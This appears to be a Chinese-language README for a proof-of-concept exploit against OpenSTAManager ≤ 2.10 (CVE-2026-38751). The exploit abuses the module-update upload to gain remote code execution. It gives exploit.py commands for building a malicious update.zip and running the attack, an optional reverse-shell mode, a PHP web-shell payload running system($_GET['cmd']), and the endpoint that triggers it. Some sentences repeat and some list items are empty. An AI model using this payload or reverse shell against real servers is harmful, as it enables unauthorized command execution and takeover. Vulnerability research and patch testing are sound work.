
该仓库包含针对 CVE-2026-38751 的概念验证(PoC)漏洞利用代码,影响 OpenSTAManager ≤ 2.10。该漏洞允许已认证的攻击者通过模块更新功能上传恶意模块,导致任意文件上传和远程代码执行(RCE)。
此仓库包含针对 CVE-2026-38751 的概念验证(PoC)漏洞利用代码,影响 OpenSTAManager ≤ 2.10。 该漏洞允许已认证的攻击者通过模块更新功能上传恶意模块,从而导致任意文件上传和远程代码执行(RCE)。
modules/aggiornamenti/upload_modules.php)模块更新功能允许已认证用户上传基于 ZIP 的模块,但未对文件内容或执行边界进行适当验证。 攻击者可以构造包含 PHP 载荷(payload)的恶意模块,这些模块随后会被部署到 Web 根目录,并通过应用程序上下文执行。 这会导致:
##Impact 成功利用可实现:
python exploit.py --build
生成内容:
update.zip
└── run/
├── MODULE
└── evil.php
python exploit.py <username> <password> <target_url>
可选的反向 Shell 模式:
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>
示例载荷(Payload)
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>
如果成功,以下端点可执行系统命令:
/modules/run/evil.php?cmd=id
本项目仅供:
请勿在未经明确许可的情况下对系统使用。
备注
检测结果可能因服务器配置而异。 某些部署可能会禁用模块目录中的直接 PHP 执行。 模块激活的时机可能需要重试。
致谢